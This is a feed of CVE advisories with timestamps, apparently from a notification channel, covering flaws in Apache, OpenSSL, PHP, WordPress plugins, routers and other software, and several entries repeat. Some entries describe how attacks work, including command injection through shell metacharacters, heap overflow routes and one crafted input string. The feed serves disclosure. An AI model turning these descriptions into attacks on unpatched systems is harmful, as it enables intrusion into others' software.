🚨 CVE-2023-45802When a HTTP/2 stream was reset (RST frame) by a client, there was a time window were the request's memory resources were not reclaimed immediately. Instead, de-allocation was deferred to connection close. A client could send new requests and resets, keeping the connection busy and open and causing the memory footprint to keep on growing. On connection close, all resources were reclaimed, but the process might run out of memory before that.This was found by the reporter during testing of CVE-2023-44487 (HTTP/2 Rapid Reset Exploit) with their own test client. During "normal" HTTP/2 use, the probability to hit this bug is very low. The kept memory would not become noticeable before the connection closes or times out.Users are recommended to upgrade to version 2.4.58, which fixes the issue.🎖@cveNotify |
|
| 2024-06-10 17:37:42 |
🚨 CVE-2023-45681stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger memory write past an allocated heap buffer in `start_decoder`. The root cause is a potential integer overflow in `sizeof(char*) * (f->comment_list_length)` which may make `setup_malloc` allocate less memory than required. Since there is another integer overflow an attacker may overflow it too to force `setup_malloc` to return 0 and make the exploit more reliable. This issue may lead to code execution.🎖@cveNotify |
|
| 2024-06-10 17:37:38 |
🚨 CVE-2023-36308disintegration Imaging 1.6.2 allows attackers to cause a panic (because of an integer index out of range during a Grayscale call) via a crafted TIFF file to the scan function of scanner.go. NOTE: it is unclear whether there are common use cases in which this panic could have any security consequence🎖@cveNotify |
|
| 2024-06-10 17:37:37 |
🚨 CVE-2023-3446Issue summary: Checking excessively long DH keys or parameters may be very slow.Impact summary: Applications that use the functions DH_check(), DH_check_ex()or EVP_PKEY_param_check() to check a DH key or DH parameters may experience longdelays. Where the key or parameters that are being checked have been obtainedfrom an untrusted source this may lead to a Denial of Service.The function DH_check() performs various checks on DH parameters. One of thosechecks confirms that the modulus ('p' parameter) is not too large. Trying to usea very large modulus is slow and OpenSSL will not normally use a modulus whichis over 10,000 bits in length.However the DH_check() function checks numerous aspects of the key or parametersthat have been supplied. Some of those checks use the supplied modulus valueeven if it has already been found to be too large.An application that calls DH_check() and supplies a key or parameters obtainedfrom an untrusted source could be vulernable to a Denial of Service attack.The function DH_check() is itself called by a number of other OpenSSL functions.An application calling any of those other functions may similarly be affected.The other functions affected by this are DH_check_ex() andEVP_PKEY_param_check().Also vulnerable are the OpenSSL dhparam and pkeyparam command line applicationswhen using the '-check' option.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.🎖@cveNotify |
|
| 2024-06-10 17:37:36 |
🚨 CVE-2023-31130c-ares is an asynchronous resolver library. ares_inet_net_pton() is vulnerable to a buffer underflow for certain ipv6 addresses, in particular "0::00:00:00/2" was found to cause an issue. C-ares only uses this function internally for configuration purposes which would require an administrator to configure such an address via ares_set_sortlist(). However, users may externally use ares_inet_net_pton() for other purposes and thus be vulnerable to more severe issues. This issue has been fixed in 1.19.1.🎖@cveNotify |
|
| 2024-06-10 17:37:32 |
🚨 CVE-2023-27974Bitwarden through 2023.2.1 offers password auto-fill when the second-level domain matches, e.g., a password stored for an example.com hosting provider when customer-website.example.com is visited. NOTE: the vendor's position is that "Auto-fill on page load" is not enabled by default.🎖@cveNotify |
|
| 2024-06-10 17:37:31 |
🚨 CVE-2023-24055KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.🎖@cveNotify |
|
| 2024-06-10 17:37:30 |
🚨 CVE-2022-37783All Craft CMS versions between 3.0.0 and 3.7.32 disclose password hashes of users who authenticate using their E-Mail address or username in Anti-CSRF-Tokens. Craft CMS uses a cookie called CRAFT_CSRF_TOKEN and a HTML hidden field called CRAFT_CSRF_TOKEN to avoid Cross Site Request Forgery attacks. The CRAFT_CSRF_TOKEN cookie discloses the password hash in without encoding it whereas the corresponding HTML hidden field discloses the users' password hash in a masked manner, which can be decoded by using public functions of the YII framework.🎖@cveNotify |
|
| 2024-06-10 16:37:25 |
🚨 CVE-2018-15133In Laravel Framework through 5.5.40 and 5.6.x through 5.6.29, remote code execution might occur as a result of an unserialize call on a potentially untrusted X-XSRF-TOKEN value. This involves the decrypt method in Illuminate/Encryption/Encrypter.php and PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc. The attacker must know the application key, which normally would never occur, but could happen if the attacker previously had privileged access or successfully accomplished a previous attack.🎖@cveNotify |
|
| 2024-06-10 16:07:25 |
🚨 CVE-2024-21338Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-10 16:07:24 |
🚨 CVE-2023-46805An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.🎖@cveNotify |
|
| 2024-06-10 15:38:14 |
🚨 CVE-2022-45176An issue was discovered in LIVEBOX Collaboration vDesk through v018. Stored Cross-site Scripting (XSS) can occur under the /api/v1/getbodyfile endpoint via the uri parameter. The web application (through its vShare functionality section) doesn't properly check parameters, sent in HTTP requests as input, before saving them on the server. In addition, crafted JavaScript content can then be reflected back to the end user and executed by the web browser.🎖@cveNotify |
|
| 2024-06-10 15:38:10 |
🚨 CVE-2022-45168An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication can occur under the /login/backup_code endpoint and the /api/v1/vdeskintegration/createbackupcodes endpoint, because the application allows a user to generate or regenerate the backup codes before checking the TOTP.🎖@cveNotify |
|
| 2024-06-10 15:38:09 |
🚨 CVE-2023-29360Microsoft Streaming Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-10 15:38:08 |
🚨 CVE-2023-24955Microsoft SharePoint Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-10 15:38:07 |
🚨 CVE-2020-17519A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.🎖@cveNotify |
|
| 2024-06-10 13:38:28 |
🚨 CVE-2024-5786Cross-Site Request Forgery vulnerability in Comtrend router WLD71-T1_v2.0.201820, affecting the GRG-4280us version. This vulnerability allows an attacker to force an end user to execute unwanted actions in a web application to which he is authenticated.🎖@cveNotify |
|
| 2024-06-10 13:38:27 |
🚨 CVE-2024-5785Command injection vulnerability in Comtrend router WLD71-T1_v2.0.201820, affecting the GRG-4280us version. This vulnerability could allow an authenticated user to execute commands inside the router by making a POST request to the URL “/boaform/admin/formUserTracert”.🎖@cveNotify |
|
| 2024-06-10 13:38:23 |
🚨 CVE-2024-5774A vulnerability has been found in SourceCodester Stock Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file index.php of the component Login. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-267457 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-10 13:38:22 |
🚨 CVE-2024-0596The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the editor_html() function in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to view password protected and draft posts.🎖@cveNotify |
|
| 2024-06-10 13:38:21 |
🚨 CVE-2021-37147Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0.🎖@cveNotify |
|
| 2024-06-10 13:07:42 |
🚨 CVE-2024-4328A Cross-Site Request Forgery (CSRF) vulnerability exists in the clear_personality_files_list function of the parisneo/lollms-webui v9.6. The vulnerability arises from the use of a GET request to clear personality files list, which lacks proper CSRF protection. This flaw allows attackers to trick users into performing actions without their consent, such as deleting important files on the system. The issue is present in the application's handling of requests, making it susceptible to CSRF attacks that could lead to unauthorized actions being performed on behalf of the user.🎖@cveNotify |
|
| 2024-06-10 13:07:41 |
🚨 CVE-2024-35735Missing Authorization vulnerability in CodePeople WP Time Slots Booking Form.This issue affects WP Time Slots Booking Form: from n/a through 1.2.11.🎖@cveNotify |
|
| 2024-06-10 13:07:37 |
🚨 CVE-2024-35729Missing Authorization vulnerability in Tickera.This issue affects Tickera: from n/a through 3.5.2.6.🎖@cveNotify |
|
| 2024-06-10 13:07:36 |
🚨 CVE-2024-35725Missing Authorization vulnerability in LA-Studio LA-Studio Element Kit for Elementor.This issue affects LA-Studio Element Kit for Elementor: from n/a through 1.3.6.🎖@cveNotify |
|
| 2024-06-10 13:07:35 |
🚨 CVE-2024-35724Missing Authorization vulnerability in Bosa Themes Bosa Elementor Addons and Templates for WooCommerce.This issue affects Bosa Elementor Addons and Templates for WooCommerce: from n/a through 1.0.12.🎖@cveNotify |
|
| 2024-06-10 13:07:31 |
🚨 CVE-2024-35722Missing Authorization vulnerability in A WP Life Slider Responsive Slideshow – Image slider, Gallery slideshow.This issue affects Slider Responsive Slideshow – Image slider, Gallery slideshow: from n/a through 1.4.0.🎖@cveNotify |
|
| 2024-06-10 13:07:30 |
🚨 CVE-2024-35717Missing Authorization vulnerability in A WP Life Media Slider – Photo Sleder, Video Slider, Link Slider, Carousal Slideshow.This issue affects Media Slider – Photo Sleder, Video Slider, Link Slider, Carousal Slideshow: from n/a through 1.3.9.🎖@cveNotify |
|
| 2024-06-10 13:07:26 |
🚨 CVE-2024-22298Missing Authorization vulnerability in TMS Amelia ameliabooking.This issue affects Amelia: from n/a through 1.0.98.🎖@cveNotify |
|
| 2024-06-10 13:07:25 |
🚨 CVE-2024-21751Missing Authorization vulnerability in RabbitLoader.This issue affects RabbitLoader: from n/a through 2.19.13.🎖@cveNotify |
|
| 2024-06-10 13:07:24 |
🚨 CVE-2024-4577In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.🎖@cveNotify |
|
| 2024-06-10 11:37:24 |
🚨 CVE-2024-5775A vulnerability was found in SourceCodester Vehicle Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file updatebill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-267458 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-10 09:37:24 |
🚨 CVE-2024-36971In the Linux kernel, the following vulnerability has been resolved:net: fix __dst_negative_advice() race__dst_negative_advice() does not enforce proper RCU rules whensk->dst_cache must be cleared, leading to possible UAF.RCU rules are that we must first clear sk->sk_dst_cache,then call dst_release(old_dst).Note that sk_dst_reset(sk) is implementing this protocol correctly,while __dst_negative_advice() uses the wrong order.Given that ip6_negative_advice() has special logicagainst RTF_CACHE, this means each of the three ->negative_advice()existing methods must perform the sk_dst_reset() themselves.Note the check against NULL dst is centralized in__dst_negative_advice(), there is no need to duplicateit in various callbacks.Many thanks to Clement Lecigne for tracking this issue.This old bug became visible after the blamed commit, using UDP sockets.🎖@cveNotify |
|
| 2024-06-10 08:38:04 |
🚨 CVE-2024-4745Missing Authorization vulnerability in RafflePress Giveaways and Contests by RafflePress.This issue affects Giveaways and Contests by RafflePress: from n/a through 1.12.4.🎖@cveNotify |
|
| 2024-06-10 08:38:03 |
🚨 CVE-2024-4328A Cross-Site Request Forgery (CSRF) vulnerability exists in the clear_personality_files_list function of the parisneo/lollms-webui v9.6. The vulnerability arises from the use of a GET request to clear personality files list, which lacks proper CSRF protection. This flaw allows attackers to trick users into performing actions without their consent, such as deleting important files on the system. The issue is present in the application's handling of requests, making it susceptible to CSRF attacks that could lead to unauthorized actions being performed on behalf of the user.🎖@cveNotify |
|
| 2024-06-10 08:38:02 |
🚨 CVE-2024-35742Missing Authorization vulnerability in Code Parrots Easy Forms for Mailchimp.This issue affects Easy Forms for Mailchimp: from n/a through 6.9.0.🎖@cveNotify |
|
| 2024-06-10 08:38:01 |
🚨 CVE-2024-35741Missing Authorization vulnerability in Awesome Support Team Awesome Support.This issue affects Awesome Support: from n/a through 6.1.7.🎖@cveNotify |
|
| 2024-06-10 08:37:57 |
🚨 CVE-2024-35735Missing Authorization vulnerability in CodePeople WP Time Slots Booking Form.This issue affects WP Time Slots Booking Form: from n/a through 1.2.11.🎖@cveNotify |
|
| 2024-06-10 08:37:56 |
🚨 CVE-2024-35727Missing Authorization vulnerability in actpro Extra Product Options for WooCommerce.This issue affects Extra Product Options for WooCommerce: from n/a through 3.0.6.🎖@cveNotify |
|
| 2024-06-10 08:37:55 |
🚨 CVE-2024-35725Missing Authorization vulnerability in LA-Studio LA-Studio Element Kit for Elementor.This issue affects LA-Studio Element Kit for Elementor: from n/a through 1.3.6.🎖@cveNotify |
|
| 2024-06-10 08:37:51 |
🚨 CVE-2024-35724Missing Authorization vulnerability in Bosa Themes Bosa Elementor Addons and Templates for WooCommerce.This issue affects Bosa Elementor Addons and Templates for WooCommerce: from n/a through 1.0.12.🎖@cveNotify |
|
| 2024-06-10 08:37:50 |
🚨 CVE-2024-35723Missing Authorization vulnerability in Andrew Rapps Dashboard To-Do List.This issue affects Dashboard To-Do List: from n/a through 1.2.0.🎖@cveNotify |
|
| 2024-06-10 08:37:49 |
🚨 CVE-2024-35721Missing Authorization vulnerability in A WP Life Image Gallery – Lightbox Gallery, Responsive Photo Gallery, Masonry Gallery.This issue affects Image Gallery – Lightbox Gallery, Responsive Photo Gallery, Masonry Gallery: from n/a through 1.4.5.🎖@cveNotify |
|
| 2024-06-10 08:37:48 |
🚨 CVE-2024-35720Missing Authorization vulnerability in A WP Life Album Gallery – WordPress Gallery.This issue affects Album Gallery – WordPress Gallery: from n/a through 1.5.7.🎖@cveNotify |
|
| 2024-06-10 08:37:44 |
🚨 CVE-2024-35717Missing Authorization vulnerability in A WP Life Media Slider – Photo Sleder, Video Slider, Link Slider, Carousal Slideshow.This issue affects Media Slider – Photo Sleder, Video Slider, Link Slider, Carousal Slideshow: from n/a through 1.3.9.🎖@cveNotify |
|
| 2024-06-10 08:37:43 |
🚨 CVE-2024-22298Missing Authorization vulnerability in TMS Amelia ameliabooking.This issue affects Amelia: from n/a through 1.0.98.🎖@cveNotify |
|
| 2024-06-10 08:37:42 |
🚨 CVE-2024-21751Missing Authorization vulnerability in RabbitLoader.This issue affects RabbitLoader: from n/a through 2.19.13.🎖@cveNotify |
|
| 2024-06-10 03:37:49 |
🚨 CVE-2024-4577In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.🎖@cveNotify |
|
| 2024-06-10 03:07:53 |
🚨 CVE-2024-35753Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TemplatesNext TemplatesNext OnePager allows Stored XSS.This issue affects TemplatesNext OnePager: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-06-10 03:07:52 |
🚨 CVE-2024-5758The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the filterMobileText parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-10 03:07:47 |
🚨 CVE-2024-5638The Formula theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in the 'ti_customizer_notify_dismiss_recommended_plugins' AJAX action in all versions up to, and including, 0.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-10 03:07:46 |
🚨 CVE-2024-4661The WP Reset plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_ajax function in all versions up to, and including, 2.02. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the value fo the 'License Key' field for the 'Activate Pro License' setting.🎖@cveNotify |
|
| 2024-06-10 03:07:41 |
🚨 CVE-2024-3668The PowerPack Pro for Elementor plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.10.17. This is due to the plugin not restricting low privileged users from setting a default role for a registration form. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with administrator set as the default role and then register as an administrator.🎖@cveNotify |
|
| 2024-06-10 03:07:40 |
🚨 CVE-2024-1694Inappropriate implementation in Google Updator prior to 1.3.36.351 in Google Chrome allowed a local attacker to bypass discretionary access control via a malicious file. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-10 03:07:36 |
🚨 CVE-2023-49224Precor touchscreen console P62, P80, and P82 contains a default SSH public key in the authorized_keys file. A remote attacker could use this key to gain root privileges.🎖@cveNotify |
|
| 2024-06-10 03:07:35 |
🚨 CVE-2023-49222Precor touchscreen console P82 contains a private SSH key that corresponds to a default public key. A remote attacker could exploit this to gain root privileges.🎖@cveNotify |
|
| 2024-06-10 03:07:34 |
🚨 CVE-2023-49221Precor touchscreen console P62, P80, and P82 could allow a remote attacker (within the local network) to bypass security restrictions, and access the service menu, because there is a hard-coded service code.🎖@cveNotify |
|
| 2024-06-09 23:37:24 |
🚨 CVE-2024-5389In lunary-ai/lunary version 1.2.13, an insufficient granularity of access control vulnerability allows users to create, update, get, and delete prompt variations for datasets not owned by their organization. This issue arises due to the application not properly validating the ownership of dataset prompts and their variations against the organization or project of the requesting user. As a result, unauthorized modifications to dataset prompts can occur, leading to altered or removed dataset prompts without proper authorization. This vulnerability impacts the integrity and consistency of dataset information, potentially affecting the results of experiments.🎖@cveNotify |
|
| 2024-06-09 20:37:25 |
🚨 CVE-2024-37569An issue was discovered on Mitel 6869i through 4.5.0.41 and 5.x through 5.0.0.1018 devices. A command injection vulnerability exists in the hostname parameter taken in by the provis.html endpoint. The provis.html endpoint performs no sanitization on the hostname parameter (sent by an authenticated user), which is subsequently written to disk. During boot, the hostname parameter is executed as part of a series of shell commands. Attackers can achieve remote code execution in the root context by placing shell metacharacters in the hostname parameter.🎖@cveNotify |
|
| 2024-06-09 20:37:24 |
🚨 CVE-2024-2408The openssl_private_decrypt function in PHP, when using PKCS1 padding (OPENSSL_PKCS1_PADDING, which is the default), is vulnerable to the Marvin Attack unless it is used with an OpenSSL version that includes the changes from this pull request: https://github.com/openssl/openssl/pull/13817 (rsa_pkcs1_implicit_rejection). These changes are part of OpenSSL 3.2 and have also been backported to stable versions of various Linux distributions, as well as to the PHP builds provided for Windows since the previous release. All distributors and builders should ensure that this version is used to prevent PHP from being vulnerable.PHP Windows builds for the versions 8.1.29, 8.2.20 and 8.3.8 and above include OpenSSL patches that fix the vulnerability.🎖@cveNotify |
|
| 2024-06-09 19:37:35 |
🚨 CVE-2024-37568lepture Authlib before 1.3.1 has algorithm confusion with asymmetric public keys. Unless an algorithm is specified in a jwt.decode call, HMAC verification is allowed with any asymmetric public key. (This is similar to CVE-2022-29217 and CVE-2024-33663.)🎖@cveNotify |
|
| 2024-06-09 19:37:31 |
🚨 CVE-2024-35662Missing Authorization vulnerability in Andreas Sofantzis Simple COD Fees for WooCommerce.This issue affects Simple COD Fees for WooCommerce: from n/a through 2.0.2.🎖@cveNotify |
|
| 2024-06-09 19:37:30 |
🚨 CVE-2024-34802Missing Authorization vulnerability in AdFoxly AdFoxly – Ad Manager, AdSense Ads & Ads.Txt.This issue affects AdFoxly – Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5.🎖@cveNotify |
|
| 2024-06-09 19:37:29 |
🚨 CVE-2024-32081Missing Authorization vulnerability in Websupporter Filter Custom Fields & Taxonomies Light.This issue affects Filter Custom Fields & Taxonomies Light: from n/a through 1.05.🎖@cveNotify |
|
| 2024-06-09 19:37:26 |
🚨 CVE-2024-31284Missing Authorization vulnerability in WPDeveloper EmbedPress.This issue affects EmbedPress: from n/a through 3.9.8.🎖@cveNotify |
|
| 2024-06-09 19:37:25 |
🚨 CVE-2024-31276Missing Authorization vulnerability in WPFactory Products, Order & Customers Export for WooCommerce.This issue affects Products, Order & Customers Export for WooCommerce: from n/a through 2.0.8.🎖@cveNotify |
|
| 2024-06-09 19:37:24 |
🚨 CVE-2024-31275Missing Authorization vulnerability in Metagauss EventPrime.This issue affects EventPrime: from n/a through 3.3.4.🎖@cveNotify |
|
| 2024-06-09 18:37:37 |
🚨 CVE-2024-32713Missing Authorization vulnerability in AutoWriter AI Post Generator | AutoWriter.This issue affects AI Post Generator | AutoWriter: from n/a through 3.3.🎖@cveNotify |
|
| 2024-06-09 18:37:33 |
🚨 CVE-2024-32705Missing Authorization vulnerability in reputeinfosystems ARForms.This issue affects ARForms: from n/a through 6.4.🎖@cveNotify |
|
| 2024-06-09 18:37:32 |
🚨 CVE-2024-32701Missing Authorization vulnerability in InstaWP Team InstaWP Connect.This issue affects InstaWP Connect: from n/a through 0.1.0.24.🎖@cveNotify |
|
| 2024-06-09 18:37:31 |
🚨 CVE-2024-31423Missing Authorization vulnerability in Alex Volkov WP Accessibility Helper (WAH).This issue affects WP Accessibility Helper (WAH): from n/a through 0.6.2.5.🎖@cveNotify |
|
| 2024-06-09 18:37:27 |
🚨 CVE-2024-31359Missing Authorization vulnerability in Premmerce Premmerce Product Filter for WooCommerce.This issue affects Premmerce Product Filter for WooCommerce: from n/a through 3.7.2.🎖@cveNotify |
|
| 2024-06-09 18:37:26 |
🚨 CVE-2024-31350Missing Authorization vulnerability in AWP Classifieds Team AWP Classifieds.This issue affects AWP Classifieds: from n/a through 4.3.1.🎖@cveNotify |
|
| 2024-06-09 18:37:25 |
🚨 CVE-2024-31347Missing Authorization vulnerability in Data443 Tracking Code Manager.This issue affects Tracking Code Manager: from n/a through 2.1.0.🎖@cveNotify |
|
| 2024-06-09 18:37:24 |
🚨 CVE-2024-31307Missing Authorization vulnerability in appscreo Easy Social Share Buttons.This issue affects Easy Social Share Buttons: from n/a through 9.4.🎖@cveNotify |
|
| 2024-06-09 17:37:25 |
🚨 CVE-2024-32715Missing Authorization vulnerability in Olive Themes Olive One Click Demo Import.This issue affects Olive One Click Demo Import: from n/a through 1.1.1.🎖@cveNotify |
|
| 2024-06-09 17:37:24 |
🚨 CVE-2024-32714Missing Authorization vulnerability in Academy LMS academy.This issue affects Academy LMS: from n/a through 1.9.16.🎖@cveNotify |
|
| 2024-06-09 15:37:25 |
🚨 CVE-2024-37535GNOME VTE before 0.76.3 allows an attacker to cause a denial of service (memory consumption) via a window resize escape sequence, a related issue to CVE-2000-0476.🎖@cveNotify |
|
| 2024-06-09 15:37:24 |
🚨 CVE-2024-32727Missing Authorization vulnerability in Rometheme RomethemeForm For Elementor.This issue affects RomethemeForm For Elementor: from n/a through 1.1.2.🎖@cveNotify |
|
| 2024-06-09 13:37:46 |
🚨 CVE-2024-32824Missing Authorization vulnerability in Evergreen Content Poster.This issue affects Evergreen Content Poster: from n/a through 1.4.2.🎖@cveNotify |
|
| 2024-06-09 13:37:45 |
🚨 CVE-2024-32821Missing Authorization vulnerability in TotalSuite Total Poll Lite.This issue affects Total Poll Lite: from n/a through 4.9.9.🎖@cveNotify |
|
| 2024-06-09 13:37:44 |
🚨 CVE-2024-32818Missing Authorization vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF).This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-06-09 13:37:43 |
🚨 CVE-2024-32814Missing Authorization vulnerability in Zorem Advanced Local Pickup for WooCommerce.This issue affects Advanced Local Pickup for WooCommerce: from n/a through 1.6.1.🎖@cveNotify |
|
| 2024-06-09 13:37:39 |
🚨 CVE-2024-32813Missing Authorization vulnerability in SoftLab Integrate Google Drive.This issue affects Integrate Google Drive: from n/a through 1.3.9.🎖@cveNotify |
|
| 2024-06-09 13:37:38 |
🚨 CVE-2024-32805Missing Authorization vulnerability in Social Snap.This issue affects Social Snap: from n/a through 1.3.5.🎖@cveNotify |
|
| 2024-06-09 13:37:37 |
🚨 CVE-2024-32804Missing Authorization vulnerability in Martin Gibson WP GoToWebinar.This issue affects WP GoToWebinar: from n/a through 14.46.🎖@cveNotify |
|
| 2024-06-09 13:37:36 |
🚨 CVE-2024-32799Missing Authorization vulnerability in Merv Barrett Easy Property Listings.This issue affects Easy Property Listings: from n/a through 3.5.3.🎖@cveNotify |
|
| 2024-06-09 13:37:32 |
🚨 CVE-2024-32797Missing Authorization vulnerability in Martin Gibson WP LinkedIn Auto Publish.This issue affects WP LinkedIn Auto Publish: from n/a through 8.11.🎖@cveNotify |
|
| 2024-06-09 13:37:31 |
🚨 CVE-2024-32787Missing Authorization vulnerability in Copy Content Protection Team Secure Copy Content Protection and Content Locking.This issue affects Secure Copy Content Protection and Content Locking: from n/a through 3.7.1.🎖@cveNotify |
|
| 2024-06-09 13:37:30 |
🚨 CVE-2024-32784Missing Authorization vulnerability in CookieHub.This issue affects CookieHub: from n/a through 1.1.0.🎖@cveNotify |
|
| 2024-06-09 13:37:26 |
🚨 CVE-2024-32779Missing Authorization vulnerability in Avirtum Vision Interactive.This issue affects Vision Interactive: from n/a through 1.7.1.🎖@cveNotify |
|
| 2024-06-09 13:37:25 |
🚨 CVE-2024-32777Missing Authorization vulnerability in BizSwoop a CPF Concepts, LLC Brand BizPrint.This issue affects BizPrint: from n/a through 4.3.39.🎖@cveNotify |
|
| 2024-06-09 13:37:24 |
🚨 CVE-2023-45188IBM Engineering Lifecycle Optimization Publishing 7.0.2 and 7.03 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted request, a remote attacker could exploit this vulnerability to upload a malicious file, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 268751.🎖@cveNotify |
|
| 2024-06-09 12:37:44 |
🚨 CVE-2024-35669Missing Authorization vulnerability in Bowo Debug Log Manager.This issue affects Debug Log Manager: from n/a through 2.3.1.🎖@cveNotify |
|
| 2024-06-09 12:37:43 |
🚨 CVE-2024-34435Missing Authorization vulnerability in CodeRevolution Aiomatic.This issue affects Aiomatic: from n/a through 1.9.3.🎖@cveNotify |
|
| 2024-06-09 12:37:42 |
🚨 CVE-2024-33565Missing Authorization vulnerability in UkrSolution Barcode Scanner with Inventory & Order Manager.This issue affects Barcode Scanner with Inventory & Order Manager: from n/a through 1.5.3.🎖@cveNotify |
|
| 2024-06-09 12:37:38 |
🚨 CVE-2024-33563Missing Authorization vulnerability in 8theme XStore.This issue affects XStore: from n/a through 9.3.8.🎖@cveNotify |
|
| 2024-06-09 12:37:37 |
🚨 CVE-2024-33555Missing Authorization vulnerability in 8theme XStore Core.This issue affects XStore Core: from n/a through 5.3.8.🎖@cveNotify |
|
| 2024-06-09 12:37:36 |
🚨 CVE-2024-33547Missing Authorization vulnerability in AA-Team WZone.This issue affects WZone: from n/a through 14.0.10.🎖@cveNotify |
|
| 2024-06-09 12:37:32 |
🚨 CVE-2024-33543Missing Authorization vulnerability in CodePeople WP Time Slots Booking Form.This issue affects WP Time Slots Booking Form: from n/a through 1.2.06.🎖@cveNotify |
|
| 2024-06-09 12:37:31 |
🚨 CVE-2024-31273Missing Authorization vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin.This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.8.3.🎖@cveNotify |
|
| 2024-06-09 12:37:30 |
🚨 CVE-2024-31267Missing Authorization vulnerability in WP Desk Flexible Checkout Fields for WooCommerce.This issue affects Flexible Checkout Fields for WooCommerce: from n/a through 4.1.2.🎖@cveNotify |
|
| 2024-06-09 12:37:26 |
🚨 CVE-2024-31252Missing Authorization vulnerability in dFactory Responsive Lightbox.This issue affects Responsive Lightbox: from n/a through 2.4.6.🎖@cveNotify |
|
| 2024-06-09 12:37:25 |
🚨 CVE-2024-31244Missing Authorization vulnerability in Bricksforge.This issue affects Bricksforge: from n/a through 2.0.17.🎖@cveNotify |
|
| 2024-06-09 12:37:24 |
🚨 CVE-2024-31243Missing Authorization vulnerability in Bricksforge.This issue affects Bricksforge: from n/a through 2.0.17.🎖@cveNotify |
|
| 2024-06-09 11:37:42 |
🚨 CVE-2024-30544Missing Authorization vulnerability in UPQODE Whizzy.This issue affects Whizzy: from n/a through 1.1.18.🎖@cveNotify |
|
| 2024-06-09 11:37:38 |
🚨 CVE-2024-30529Missing Authorization vulnerability in Tainacan.Org Tainacan.This issue affects Tainacan: from n/a through 0.20.7.🎖@cveNotify |
|
| 2024-06-09 11:37:37 |
🚨 CVE-2024-30515Missing Authorization vulnerability in Pixelite Events Manager.This issue affects Events Manager: from n/a through 6.4.6.4.🎖@cveNotify |
|
| 2024-06-09 11:37:36 |
🚨 CVE-2024-30485Missing Authorization vulnerability in XLPlugins Finale Lite.This issue affects Finale Lite: from n/a through 2.18.0.🎖@cveNotify |
|
| 2024-06-09 11:37:32 |
🚨 CVE-2024-30481Broken Access Control vulnerability in Samuel Marshall JCH Optimize.This issue affects JCH Optimize: from n/a through 4.0.0.🎖@cveNotify |
|
| 2024-06-09 11:37:31 |
🚨 CVE-2024-30467Missing Authorization vulnerability in WPDeveloper Essential Blocks for Gutenberg.This issue affects Essential Blocks for Gutenberg: from n/a through 4.4.9.🎖@cveNotify |
|
